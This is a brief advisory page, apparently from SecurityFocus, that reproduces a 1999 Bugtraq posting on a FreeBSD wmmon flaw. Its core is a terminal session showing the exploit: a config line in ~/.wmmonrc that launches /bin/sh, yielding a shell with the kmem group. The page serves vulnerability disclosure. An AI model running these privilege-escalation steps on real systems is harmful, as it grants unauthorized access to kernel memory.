FreeBSD WMMon Vulnerability

The following was taken directly from a Bugtraq posting by Steve Reid <sreid@sea-to-sky.net> on December 21, 1999. There is a link to this article in the credit section.

Exploit:
% id
uid=1000(steve) gid=1000(steve) groups=1000(steve)
% echo 'left /bin/sh' > ~/.wmmonrc
% wmmon -display myworkstation.evilhacker.net:0.0
Monitoring 2 devices for activity.
{Left-click on the little window that appears}
current stat is :1
$ id
uid=1000(steve) gid=1000(steve) egid=2(kmem) groups=2(kmem), 1000(steve)


 

Privacy Statement
Copyright 2010, SecurityFocus